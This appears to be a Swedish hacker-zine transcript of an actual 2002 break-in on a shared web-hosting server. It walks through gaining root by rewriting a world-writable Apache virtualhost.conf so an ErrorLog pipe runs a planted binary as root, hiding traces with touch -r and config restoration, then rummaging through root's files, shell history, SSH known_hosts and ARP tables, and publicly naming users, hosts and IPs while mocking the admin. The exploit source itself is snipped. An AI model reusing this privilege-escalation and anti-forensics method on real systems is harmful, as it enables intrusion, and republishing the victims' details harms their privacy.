1 httpd httpd 61 Aug 5 15:24 php.ini -rw-r--r-- 1 root root 357 Aug 25 21:51 srm.conf.default -rw-r--r-- 1 root root 12381 Aug 25 21:51 mime.types.default -rw-r--r-- 1 root root 12965 Aug 25 21:51 magic.default -rw-r--r-- 1 root root 33635 Aug 25 21:51 httpd.conf.default -rw-r--r-- 1 root root 348 Aug 25 21:51 access.conf.default -rwxrwxrwx 1 httpd httpd 32788 Aug 25 21:55 httpd.conf -rwxr-xr-x 1 root root 51224 Aug 25 22:47 virtualhost.conf.20020825 drwxrwxrwx 3 httpd httpd 4096 Aug 25 22:47 . -rwxrwxrwx 1 httpd httpd 57271 Sep 13 12:40 virtualhost.conf # # Julafton - fast det bara r september # En vanlig finnig nrd som lrt sig hacka frn happyhacker-texterna # skulle ju sklart behva en suid fil, med ehm.. utnyttjbar kod # - samt en het sploit frn bugtraq fr koka ihop root. # # Vi kan skriva bde hr och dr - det frsta som poppar upp # i skallen r inte "wow, massdeface, alldas, irc, respekt, elajt" # # Apache r ltt att f root via om man kan skriva till httpd.conf. # Det frsta man tnker p r kanske att lta Apache ladda en modul # (eftersom den i init-rutinen krs som root), men httpd -l visar # att mod_so.c inte r inkompilerad, s vi fr kra p med ett annat trick! # $ cat virtualhost.conf #ThrottlePolicy none <Location /throttle-status> SetHandler throttle-status </Location> <VirtualHost new.burken.nu _default_> #ThrottlePolicy none DocumentRoot /usr/web/htdocs ServerName new.burken.nu </VirtualHost> <VirtualHost www.djurvall.burken.nu> ThrottlePolicy none DocumentRoot /home/djurvall/public_html ServerAlias djurvall.burken.nu ServerName www.djurvall.burken.nu # TransferLog logs/www.djurvall.burken.nu-access_log CustomLog logs/www.djurvall.burken.nu-combined combined ErrorLog logs/www.djurvall.burken.nu-error_log </VirtualHost> <VirtualHost www.charliesierra.nu> #ThrottlePolicy none DocumentRoot /home/grkplut/public_html ServerName www.charliesierra.nu ServerAlias charliesierra.nu php_admin_flag safe_mode On php_admin_flag mysql.allow_persistent off CustomLog logs/www.charliesierra.nu-combined combined ErrorLog logs/www.charliesierra.nu-error_log </VirtualHost> <VirtualHost www.motmakt.nu> #ThrottlePolicy none DocumentRoot /home/loui/public_html ServerName www.motmakt.nu ServerAlias motmakt.nu php_admin_flag safe_mode On php_admin_flag mysql.allow_persistent off CustomLog logs/www.motmakt.nu-combined combined ErrorLog logs/www.motmakt.nu-error_log </VirtualHost> # ADD HERE <VirtualHost www3.se.postgresql.org> #ThrottlePolicy none DocumentRoot /export/vol2/webs/www3.se.postgresql.org ServerName www3.se.postgresql.org php_admin_flag safe_mode On CustomLog logs/www3.se.postgresql.org-combined combined ErrorLog logs/www3.se.postgresql.org-error_log </VirtualHost> #### Dynamiska <VirtualHost 194.236.124.42> #ThrottlePolicy none LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon UseCanonicalName Off CustomLog logs/virtual-access_log vcommon VirtualDocumentRoot /home/tyko/dynamic/%0 </VirtualHost> <VirtualHost www.burken.nu> #ThrottlePolicy none DocumentRoot /usr/web/webs/www.burken.nu ServerName www.burken.nu # TransferLog logs/www.burken.nu-access_log # UserDir disabled UserDir http://www.burken.nu/disabled.php CustomLog logs/www.burken.nu-combined combined ErrorLog logs/www.burken.nu-error_log </VirtualHost> <VirtualHost www.xmms.org> ThrottlePolicy none DocumentRoot /home/xmms/web ServerName www.xmms.org ServerAlias sewww.xmms.org ServerAlias xmms.burken.nu <Directory /home/xmms/web> Options Includes ExecCGI Indexes AllowOverride FileInfo AuthConfig Limit <Limit GET POST OPTIONS PROPFIND> Order allow,deny Allow from all </Limit> </Directory> AddHandler server-parsed .html # TransferLog logs/www.xmms.org-access_log # CustomLog logs/www.xmms.org-referer_log referer # CustomLog logs/www.xmms.org-agent_log agent CustomLog logs/www.xmms.org-combined combined ErrorLog logs/www.xmms.org-error_log </VirtualHost> # # ven hr editerade vi kraftigt. # vi vill ju inte trka ut er, eller hur? # $ cd ../logs $ find . -name "*error*" -size 0 ./stats.burken.nu-error_log ./www.enduro.nu-error_log ./cam.spacedump.pp.se-error_log.swapped ./www.motherjames.com-error_log ./netgoblins.com-error_log.swapped-020915 ./www.backman.cc-error_log ./www.musiknoje.nu-error_log ./link.tillberg.net-error_log ./hmpfzie.nu-error_log ./arkivet.tillberg.net-error_log ./www.garnia.nu-error_log ./gettyone.burken.nu-error_log ./photodisc.burken.nu-error_log ./webcam.tracit.burken.nu-error_log $ cd .. # # Backup r A och O fr att lyckas som IT kriminell. # $ cd conf $ touch -amr virtualhost.conf /var/tmp/.v $ cp virtualhost.conf /var/tmp/.vv $ sed s',logs/www.jowi.nu-error_log,|logs/www.jowi.nu-error-log,' < virtualhost.conf > v $ cat v > virtualhost.conf $ rm v $ grep '|' virtualhost.conf ErrorLog |logs/www.jowi.nu-error-log $ cp /var/tmp/a ../logs/www.jowi.nu-error-log $ chmod 755 ../logs/www.jowi.nu-error-log $ touch -amr /var/tmp/.v virtualhost.conf . ../logs/www.jowi.nu-error-log $ pwd /usr/web/conf $ ls -alrt total 412 drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 RCS -rwxrwxrwx 1 httpd httpd 357 Feb 10 2001 srm.conf -rwxrwxrwx 1 httpd httpd 9986 Feb 10 2001 mime.types -rwxrwxrwx 1 httpd httpd 12441 Feb 10 2001 magic -rwxrwxrwx 1 httpd httpd 348 Feb 10 2001 access.conf -rw-r--r-- 1 root root 32532 Jun 3 2001 httpd.conf.old -rw-r--r-- 1 root root 23270 Jun 3 2001 virtualhost.conf.old -rwxr-xr-x 1 root root 32673 Apr 30 20:23 httpd.test.conf -rwxr-xr-x 1 root root 41060 May 1 18:35 virtualhost.test.conf drwxr-xr-x 18 root root 4096 Aug 5 15:18 .. -rwxrwxrwx 1 httpd httpd 61 Aug 5 15:24 php.ini -rw-r--r-- 1 root root 357 Aug 25 21:51 srm.conf.default -rw-r--r-- 1 root root 12381 Aug 25 21:51 mime.types.default -rw-r--r-- 1 root root 12965 Aug 25 21:51 magic.default -rw-r--r-- 1 root root 33635 Aug 25 21:51 httpd.conf.default -rw-r--r-- 1 root root 348 Aug 25 21:51 access.conf.default -rwxrwxrwx 1 httpd httpd 32788 Aug 25 21:55 httpd.conf -rwxr-xr-x 1 root root 51224 Aug 25 22:47 virtualhost.conf.20020825 -rwxrwxrwx 1 httpd httpd 57272 Sep 13 12:40 virtualhost.conf drwxrwxrwx 3 httpd httpd 4096 Sep 13 12:40 . $ cd RCS $ ls virtualhost.conf,v $ ls -alrt total 20 -rwxrwxrwx 1 httpd httpd 8852 Nov 9 2000 virtualhost.conf,v drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 . drwxrwxrwx 3 httpd httpd 4096 Sep 13 12:40 .. $ cd ../../logs $ ls -l www.jowi.nu-error-log -rwxr-xr-x 1 httpd httpd 15848 Sep 13 12:40 www.jowi.nu-error-log # Detta r vr nya vn - programmet som ska ge oss root on demand nsta gng # Apache startas om.. # Eftersom tlmodighet r det enda vettiga s struntar vi i att kill -STOP # alla Apacheprocesser och sen gnlla hos Spacedump s han startar om Apache :P # Chansen att han upptcker nt r mindre d.. fr vem skulle inte bli # frvirrad om Apache slutade gra sitt jobb bara sdr? ;> $ strip www.jowi.nu-error-log $ ls -l www.jowi.nu-error-log -rwxr-xr-x 1 httpd httpd 6260 Sep 22 23:27 www.jowi.nu-error-log $ touch -amr /var/tmp/.v . www.jowi.nu-error-log $ cd ../conf $ grep '|' virtualhost.conf ErrorLog |logs/www.jowi.nu-error-log $ ls -l /usr/web/logs/www.jowi.nu-error-log -rwxr-xr-x 1 httpd httpd 6260 Sep 13 12:40 /usr/web/logs/www.jowi.nu-error-log # # Ngra tester som gjordes p en annan j00n1xdata visade att # |logs/www.jowi.nu-error-log inte fungerade.. Vi mste anvnda oss av # full path - inte lika sneaky, men hindrar oss knappast frn att koka roota ;) $ pwd /usr/web/conf $ sed s',|logs/www.jowi.nu-error-log,|/usr/web/logs/www.jowi.nu-error-log,' < virtualhost.conf > v $ cat v > virtualhost.conf $ rm v $ touch -amr /var/tmp/.v . virtualhost.conf $ cp virtualhost.conf /var/tmp/.vx $ cat /var/tmp/.vv > virtualhost.conf $ touch -amr /var/tmp/.v . virtualhost.conf $ uname -a Linux fs02 2.4.9 #1 SMP Thu Aug 23 18:44:06 CEST 2001 i686 unknown $ date Sun Sep 22 23:51:01 CEST 2002 $ cat /var/tmp/.vx > virtualhost.conf $ ls -l /usr/web/logs/www.jowi.nu-error-log -rwxr-xr-x 1 httpd httpd 6260 Sep 13 12:40 /usr/web/logs/www.jowi.nu-error-log $ touch -amr /var/tmp/.v virtualhost.conf . $ cd /var/tmp $ strip .a $ touch -amr .v .a .vx .vv $ date Sun Sep 22 23:57:30 CEST 2002 $ date Mon Sep 23 00:01:05 CEST 2002 $ df -k Filesystem 1k-blocks Used Available Use% Mounted on /dev/hda2 4065500 3508100 347352 91% / /dev/hda1 22580 1917 19459 9% /boot /dev/hda4 34321796 32115832 2205964 94% /export/vol1 /dev/hdb1 39076880 37517344 1559536 96% /export/vol2 fs01:/export/vol2/unix/s/spacedmp 30443079 28618001 173699 99% /home/spacedmp bettan:/usr/home/bbs/web 36294258 1037918 32352800 3% /export/vol2/webs/bbs.linux.se bettan:/usr/home/linuxse/web 36294258 1037918 32352800 3% /export/vol2/webs/www.linux.se bettan:/usr/home/lstore 36294258 1037918 32352800 3% /export/vol2/webs/www.linuxstore.se bettan:/usr/home/shellkonto/web 36294258 1037918 32352800 3% /export/vol2/webs/www.shellkonto.nu fs01:/export/vol2/unix/s/spacedmp 30443079 28618001 173699 99% /home/spacedmp fs01:/export/vol3/ftp 15920515 4564114 11185042 29% /home/ftp fs01:/export/vol2/unix/b/budis 30443079 28618001 173699 99% /home/budis fs01:/export/vol2/unix/t/tillberg 30443079 28618001 173699 99% /home/tillberg fs01:/export/vol2/unix/b/byggsus 30443079 28618001 173699 99% /home/byggsus fs01:/export/vol2/unix/a/angel 30443079 28618001 173699 99% /home/angel fs01:/export/vol2/unix/m/movitz 30443079 28618001 173699 99% /home/movitz fs01:/export/vol2/unix/k/krokros 30443079 28618001 173699 99% /home/krokros fs01:/export/vol2/unix/b/bihrner 30443079 28618001 173699 99% /home/bihrner fs01:/export/vol2/unix/s/stx 30443079 28618001 173699 99% /home/stx fs01:/export/vol2/unix/t/tripodz 30443079 28618001 173699 99% /home/tripodz fs01:/export/vol2/unix/p/psycho 30443079 28618001 173699 99% /home/psycho fs01:/export/vol2/unix/f/forze 30443079 28618001 173699 99% /home/forze fs01:/export/vol2/unix/s/sidewalk 30443079 28618001 173699 99% /home/sidewalk fs01:/export/vol2/unix/t/tilion 30443079 28618001 173699 99% /home/tilion fs01:/export/vol2/unix/s/sebbz 30443079 28618001 173699 99% /home/sebbz fs01:/export/vol2/unix/m/meat 30443079 28618001 173699 99% /home/meat fs01:/export/vol2/unix/s/smallone 30443079 28618001 173699 99% /home/smallone fs01:/export/vol2/unix/e/emess 30443079 28618001 173699 99% /home/emess $ id uid=501(httpd) gid=501(httpd) groups=501(httpd) $ cd /var/tmp $ ed a [* kod till errorlogprogram bortklipp *] . w a.c q 4297 $ make a $ gcc -o a a.c -O2 -Wall $ strip a $ rm a.c $ cd /usr/web/logs $ cat /var/tmp/a > www.jowi.nu-error-log sh: www.jowi.nu-error-log: Text file busy # haha - surprise! # ngon / ngot har precis startat om apache s den har startat www.jowi.nu-error-log # I feel lucky! Nu re nog dags att dra ner p statoil och handla lite lotter $ cd /var/tmp $ ed a [* Koden som utnyttjar errorlogprogrammet (www.jowi.nu-error-log) saxad.. Det r Flashback som varit framme och SAXAT frn oss, haha! Yo yo, det r vi som r LoLing Stoned's - shara knarket broder! *] . w r.c 1757 q $ make r cc r.c -o r $ cd /usr/web/conf $ cat /var/tmp/.vv > virtualhost.conf $ touch -amr /var/tmp/.v virtualhost.conf . # Eftersom vi inte vill bli upptckta terstllde vi konfigfilen. # Inte s stor risk att Spacedump lyckas snubbla ver det, men # man vet aldrig ;> $ /var/tmp/r & $ rm -f /var/tmp/r* $ kill -9 $$ +-------------------------------------------------------------------------+ | EDITOR note: | | Fr er som inte riktigt hngde med dr skall | | jag frklara vad det var som hnde. | | I och med att bde virtualhost.conf och logfilerna var | | skrivbara av alla s skrev dom ver en logfil med ett program, | | och bad apache att ppna den som |/usr/web/logs/www.jowi.nu-error-log | | dvs. Att programmet skulle exekveras. Som root! | | | | Detta r ett utmrkt exempel att p att hacka en dator | | utan att anvnda exploits, inga patchar skyddar mot en dum admin! | | | +-------------------------------------------------------------------------+ # I vr nya r00t-en4bl4d3!! termimnal hnde fljande $ cd /root $ ls -alrt total 29348 -rw-r--r-- 1 root root 114 May 8 1993 .lesskey -rw-r--r-- 1 root root 48 Sep 11 1996 .less -rw-r--r-- 1 root root 75277 Dec 23 1997 nc110.tar.gz -rw-r--r-- 1 root root 159028 Jun 17 1999 mpg123-0.59r.tar.gz -rw-r--r-- 1 root root 332253 Sep 6 2000 rsync-2.4.6.tar.gz -rw-r--r-- 1 root root 82161 Oct 22 2000 oidentd-1.7.1.tar.gz -rw-r--r-- 1 root root 872451 Feb 21 2001 mrtg-2.9.10.tar.gz -rw-r--r-- 1 root root 257631 Feb 22 2001 gd-1.8.4.tar.gz -rw-r--r-- 1 root root 320 Feb 26 2001 index.html -rw-r--r-- 1 root root 274318 Mar 1 2001 gd-1.8.3.tar.gz -rw-r--r-- 1 root root 12076 Mar 1 2001 mysql.db -rw-r--r-- 1 root root 297467 Mar 1 2001 reiserfs-utils-3.6.25.tar.gz -rw-r--r-- 1 root root 31 Mar 5 2001 .klogin -rw-r--r-- 1 root root 772176 Mar 11 2001 mkisofs-1.13.tar.gz drwxr-xr-x 5 root root 4096 Mar 24 2001 mirror -rwxr-xr-x 1 root root 58 Apr 12 2001 perl-test.pl drwxr-xr-x 2 root root 4096 Dec 15 2001 .ssh -rw-r--r-- 1 root root 8642 Feb 4 2002 linux-se.bash_history -rw-r--r-- 1 root root 30 Mar 16 2002 .amandahosts drwxr-xr-x 2 root root 4096 Mar 31 11:09 TAKEN -rw-r--r-- 1 root root 2695311 Apr 18 21:43 cvs-1.11.2.tar.gz?JServSessionIdservlets=fi1q876xk1 drwxr-xr-x 2 root root 4096 May 1 09:32 .mc drwxr-xr-x 2 root root 4096 Jun 26 19:54 backup drwxr-xr-x 3 root root 4096 Jun 29 18:03 cvstest drwxr-xr-x 24 root root 4096 Jun 30 10:39 .. -rw------- 1 root root 164 Jun 30 12:00 .cvspass -rw-r--r-- 1 root root 265729 Sep 4 02:44 prcinfo drwxr-xr-x 11 root root 4096 Sep 8 13:21 src -rw------- 1 root root 13256 Sep 22 17:27 .bash_history $ cd TAKEN $ ls -l total 0 drwxr-xr-x 4 root root 96 Mar 22 08:27 home/ $ cd home $ ls covers/ zao/ $ ypcat passwd|egrep zao\|covers zao:*:1346:1346:Lars Viklund [Linux.SE]:/home/zao:/bin/bash covers:*:1372:1372:Magnus Bondesson [Linux.SE]:/home/covers:/bin/bash # Enormt oetiskt.. Han har stulit folks homedirs :( # Fy fan fr dig, Spacedump! $ cd ../../dl $ ls AUTODESK.BUILDING.ELECTRICAL.V1.0.ISO-RiSE/ $ warez bash: warez: command not found # # # [ http://www.antipiratbyran.com/tips.asp ] # -------> SE HIT <------------------------- # OLAGLIGA KOPIOR P SKYDDAT MATERIAL !!! # Spacedump distribuerar olagliga kopior p dyra program! # OLAGLIGA KOPIOR P SKYDDAT MATERIAL !!! # -------------------> SE HIT <------------- # [ http://www.antipiratbyran.com/tips.asp ] # # $ cd .. $ cat .bash_history ls du vi dagbok.php cat connect.php vi connect.php exit pwd ls w uptime w who w exit ls ls du ls du ls -l cd /root/src/ ls cd .. vi /etc/passwd pwd id w w w w w w w ps auxw ps auxw ftp 0 df pwd ls cd /home/noaksson cd public_html/ l ls mysql -uroot -p _system mysql -uroot -p _system cat /etc/passwd pwd ls exit vi /etc/passwd TERM=xterm # # heh, grabben har skillz # $ id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(operator) $ arp -na & ? (194.236.124.59) at 00:60:1D:F1:76:AB [ether] on eth0 ? (194.236.124.52) at 00:D0:B7:3B:2C:89 [ether] on eth0 ? (194.236.124.49) at 00:60:1D:F1:5E:9F [ether] on eth0 ? (194.236.124.43) at 00:D0:B7:49:96:04 [ether] on eth0 ? (194.236.124.41) at 00:0A:41:FD:0E:C0 [ether] on eth0 ? (194.236.124.40) at 00:0A:41:FD:16:C0 [ether] on eth0 ? (194.236.124.36) at 00:03:47:A4:76:01 [ether] on eth0 ? (194.236.124.34) at 00:D0:B7:83:72:31 [ether] on eth0 ? (194.236.124.33) at 00:80:C8:B9:B8:B5 [ether] on eth0 $ cd .ssh $ ls -alrt total 24 -rw------- 1 root root 512 Sep 25 2001 random_seed -rw-r--r-- 1 root root 342 Dec 15 2001 authorized_keys drwxr-xr-x 2 root root 4096 Dec 15 2001 . drwx--x--- 17 root root 4096 Sep 20 15:37 .. -rw------- 1 root root 4903 Sep 22 16:13 known_hosts $ cat kn* warez,194.236.124.48 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597 warez,194.236.124.48 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0Oj0s6bGL/uXuSaUb9QGG1z3klcdivozVCBvMwe6wmGBTSuttwU7mMOhVEubqHiEVO0DsPzFXr8Sgjn94GmP5L8nQyRgkSkAxsvhM2r7RHCrP3uSZ82gB3zO8/AfzE0aQA1MokH5mA1GVJtlQ/+1la909aGfeSKXlLAHiZ8xzWE= 172.17.196.45 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwKdpuGfC3M4JOlAAUslkf3rd1QhRqv548wq2J0iDPyVLXf31QjIiCoIpDJ3y8Qtjfz621DH+0+4h8J/bflsM5296CUffNv35xQNUfV1FCB45ucQmtYsJtTjjQ2+uIjpCOSn4TKkGQc5E/NqGRnzuzLceSbNv/S4AYIH52daOOBc= 0,0.0.0.0 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyuoNtWHm6vqkmnRpdvT+HyLIwkFFRxEO9oG7i41uxXN/KBAw6uUbEVaTOAUMeD00vV9z0FJfCa3MqO3+ZuAFE+sIM/z3iReWHV5iBZnyg207drh41+kTUtDlUD3NrY9cqaVgisCIbGBKB83ReYaBNbqvnHXjlPUPefsK9jVUmGM= # # Gr vrlden en tjnst - tipsa Antipiratbyrn ASAP! # WAREZ @ warez.spacedump.pp.se # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # ---> warez,194.236.124.48 <--- # WAREZ @ warez.spacedump.pp.se # # $ cd /home $ ls alhakim bilder bobis covers djurvall engman esnweb evonite ftp hulteniu ia icom2002 kattmat liket matty perrra revo9 rickard spacedmp tilion tod treggy88 xmms zmanga zrkaska zybernic $ cd spa* $ cd .ssh $ ls -alrt total 123 -rw-r--r-- 1 spacedmp spacedmp 334 Sep 6 2000 identity.pub -rw------- 1 spacedmp spacedmp 530 Sep 6 2000 identity drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 20 2001 . -rw------- 1 spacedmp spacedmp 512 Oct 20 2001 random_seed -rw-r--r-- 1 spacedmp spacedmp 1663 Aug 7 10:24 authorized_keys -rw------- 1 spacedmp spacedmp 41725 Sep 20 09:32 known_hosts drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 .. $ cat known_hosts gosalyn.ced.chalmers.se 1024 35 151268403917718649882081152829065486043358572813676462221244838581488009668018883259815030194286947292034830350955135247480106213789589722219532161893822852791556816494078325957203917212699864296401711335670497522192692109587590299406450489604843542615765206899256517137115945667472210988874053903890991769553 serverbox.free-hosting.nu 1024 37 134597990471742974707895288295197342031673600293964367163822327663827653734449319941393977749583113461411264815777302534393502530805021218588536469617083669299202568118179635567112930274168363178497648826177618378882091848810018000604799247223998803565855288531775183107482896633568714233615450730749464083089 pucko.remedy.nu 1024 35 131615164213144470425074761948855039472420090466808230435056120628490849986772491928629537071035073133886603084946716159960194719546765158220522908862706763596358271876605852998947844089230656680791697530167204971184066256011041106908479903667075343702675011394891968264430300046239619508541974182293107456447 194.236.124.132 1024 33 161206773657465995167653167266007675180304456330077216222647192945308879014012703729891120896611820048255616303530605919118017545210641020425869773610971518864339379121346507261597510666163874003202631417433180707033207456863693689823000540652081405075335445736807320170300977530945514026503410451907070148213 lamerz.net 1024 33 161206773657465995167653167266007675180304456330077216222647192945308879014012703729891120896611820048255616303530605919118017545210641020425869773610971518864339379121346507261597510666163874003202631417433180707033207456863693689823000540652081405075335445736807320170300977530945514026503410451907070148213 194.236.124.50 1024 33 106440909399036561174668454890244934945341998838416659842612393506364123390262355634611548420273452506699161141587318167082764466077386274093814956965983662369853850388883586743829340476321227576239452527607359128736714460996865566821719397974698451962043366965666650648028836320349534718392986036732378187223 freebsd 1024 33 106440909399036561174668454890244934945341998838416659842612393506364123390262355634611548420273452506699161141587318167082764466077386274093814956965983662369853850388883586743829340476321227576239452527607359128736714460996865566821719397974698451962043366965666650648028836320349534718392986036732378187223 fs01 1024 37 134673151523792009982979064108789575564945427532815915866834835533214395963664402378972587506042837947822104411772170834113755511426407333529503782061647439799257003674412977902749846210129915720453369054692577308442177034856123715982878707735848826768516968278925459776852644465892999220595654049921315882663 138.6.217.9 1024 33 115108939138063993061560223021272460052143911224539594694976637624133329732526387293052833760334304571220488685218117210600996213042424613105888561229992708962898121879989695640622207462668817200342608748398593645921543114836463971847973148559043516969030521487173704822891707334776162958713299564817096422373 mail.krantz.pp.se 1024 37 135011172057041089136373399164064698898546616758827781781717961481860483004151552706143216896194778964030514696170025454685506922903823410328387316270481106163174758548565922019541025983027403581964400752679263811232667238295303549257426892770190876390506768135256182415104651335729007897838945015436354260863 cinderella.krantz.pp.se 1024 37 130421086946384289988428900200147743458721813940728519338781963364282317832578315342606380347111425004069101548777156656385486065836274507965737367326852126749621710985783013696019897344554626084328640822064820912229966889562182564041465508467911840650401631018561169088321801816915107509598270324080610532889 darkface.pp.se 1024 33 169080968056137498524203972835485980691586436083284108390517638264207770843540675988712702263518619516657506575115107946825001397597251586604752594767850921462811670127499444525006459868876599144723027352452723709611264352186197352429594355429842253945296045745184709818035994649383019487740966989387577500103 194.236.124.44 1024 33 156151763636703064972131629379441706363920933951421407832358295483686275516432154839031791654435442269657428529635221458758631634281241653884568570029564087038574636104194107272439305150123194472103548975986792043447918707499611200417706680171492795745570811730749529577367178917143439932529317161669394091443 194.236.124.49 1024 35 151731405636950241370576108878455140193213261930273497153187921454382081626961892019897948341809822948574452245675823228080535057316460235452245717491056171870729976611537759332063821938825159223198012666573140999001112297406197152645081876844834383263200391185869768598862253915497492900786067217237923955963 194.236.124.43 1024 37 118439828164747952241580655655004609564093003304896278175033142029698401584503244622694601145078487644463998540506251879590699623280404197799844501365192579042734347305855638344643547599092681479083916547703791633896733511966791065024020772166573074503848012211471213219739637281207141260742499665356150065431 ricefarmer.bleh.nu 1024 37 151966743160981836112112099411167483704934911666154694002338692302599283356798650778091031977900851719176237504751758782478119151107407024448464054601979062945642792352912254976613693054442207441050938916441491441461792756391812905058039148851096501668040319767840835490360266604890251564373376057535291251909 195.58.127.131 1024 37 140574403009841793113966746999342228506648563741752138192246668378423285297871271599872889578452415390299515887270868890397219453618402610120892612769927015480227037448545824481167341057457534599838998654375299094647684941872984539561888277449553139797026247504731497668224744666582532769192307155825117130963 new 1024 35 133312470361269667234165234511639086344664908731708444144543057289249464658831084265071513653947212108635308869833382024486517915754425526532683980030286284754219246036368377368152363699472298766300887141662203357088997493548669429374968367226684615772207594370780452625972805213004392904076073291672322933703 linuxse.burken.nu 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863 www.linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863 linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863 perrra.dyn.mirkkwar.nu 1024 37 137453207349046931314428046630191401605838152305527704078758799863320162626703970804927787478034430301285848715996177513583320548937699705395228852954281372184170108708112481495181049202127141964061950923747703075018738105715255313153822444088238646551849761966145395705245401633126996578739062289244384891479 217.78.33.46 1024 35 118157298531954640965896698179168201062198977069443840990896146940517470425712576168300280623574379110887261136704960690182912090936930628938701605792330583699074042830925709382601199225440417729177406576053753925098706373831525349950993826304919383989436407769713720925775314270441579513577320488325932169493 ticket.remedy.nu 1024 35 118157298531954640965896698179168201062198977069443840990896146940517470425712576168300280623574379110887261136704960690182912090936930628938701605792330583699074042830925709382601199225440417729177406576053753925098706373831525349950993826304919383989436407769713720925775314270441579513577320488325932169493 sekure.net 1024 37 131730438055444723801679576466736432066733310276900651863374391293053840076367442465405961675485952775646635875717831392171679978199662806044041198026598512044744246719523431448950131088450122390306488937177265059783863656377903055819674367455811067326607875901384251053390646246599629171476081918273602297767 shuttle.krantz.pp.se 1024 35 142035628152859982327680120961274685368949944087137525733618248336126955476228561760096033832972479530491381383987742416921022823952941155331705755664705030391765448058393060029616059070116334685443904135446887128096972929917992350654389563006325873483338215682803841940602046573179117612349093466100508754347 kib1.ki.sw.ericsson.se 1024 37 158704687540278596677855903890296536999454713058140680232826323978478010733272965027222301932877780645020411565138535407303063931666033348872466913238877090683912594295041577690307118068895310201707465904235420086578005437519611966661575107630650203324872135311374553429690413308646457997236211811444278494757 kib7.ki.sw.ericsson.se 1024 35 104852542315026155191881191063643641508021960481612787287571115379642029895090333997015203061869121775394769678864463608835361786294457488286185707581291967954923901668250185389821989918542037550799975632901254645622174398887038992815434367857413452151704771711161370846492912391454558756546808876992747602497 silence 1024 35 139491544500668523798350653194025859166736145542929098499495947917660936437603579972706503661136545046505505433891819960390337005021801768479247369010003542403899128828603716724491623078935136428066163778346533397153692230185405469961465365127721832163695155757568892233970111276729505155552876501304077580497 petra.mds.mdh.se 1024 37 124719388884348581799284457414095137201335677716923991869742871029448411753569560903410260733658273253091199642525088089564747995133964912332244457857177837454699352275907091046296763921422647523061996444226623284914660015786399563435507427735861056474734150532703858219519642808242340577290966281180011095393 irc.freebsd.nl 1024 37 143085723475127757219276887882946267947529077422380818669796524505762023054977214391615102688776838081898074490645508677303046002798887253693529925625309515016541308727869475272442066302030103413829388525434527618224810483786879074320086248333211087115484931130068705085448113562271487277810743465825835616247 213.242.136.103 1024 35 115007862614296366652372413719504901035879393921322627284981730537005169259924507902252121692176859444911590743919805435703419011514879152297994920979490305336076906649874377225436392780149089219870749273525014034004938642669795236010493949302706672905609300785896420140031440176728659583567073329531797393337 mb.geek.se 1024 35 136221961276186357962321267553591838854784657845721493746417398060347567655507971332868405209545617746680496799238554833156279600104779305009852072138301184620086155854575978566260976099870971206823958516005555170582816496579278611057544711552001575965567657658250087336829838881052442817213936286016629887249 lab.linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863 geek.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863 www.kantarell.nu 1024 35 113835508057579667641576616246491759756101604668998539163854822935679807384854505756538986146139870756007736699863628477271975452261854080548885104633632020033296009085532081813414262842254381211684709870692649718188684303524323382287371461501458073404693800082254034111831632069657178687795876106962346675313 warez 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597 fw 1024 35 142408778069536347830841840333642278628568929035810819049582757496663962381138170465552980391687006761465936577979077969110175815799101896012451653369979746915967680156574408893286831239790976910260103580995827666630628511839789031048867437040509576071863341544786884776908223248782981823147564962222545563179 www.fetbandsbolaget.nu,194.236.124.207 1024 35 113835508057579667641576616246491759756101604668998539163854822935679807384854505756538986146139870756007736699863628477271975452261854080548885104633632020033296009085532081813414262842254381211684709870692649718188684303524323382287371461501458073404693800082254034111831632069657178687795876106962346675313 chello-gw.krantz.pp.se,213.89.178.203 ssh-dss 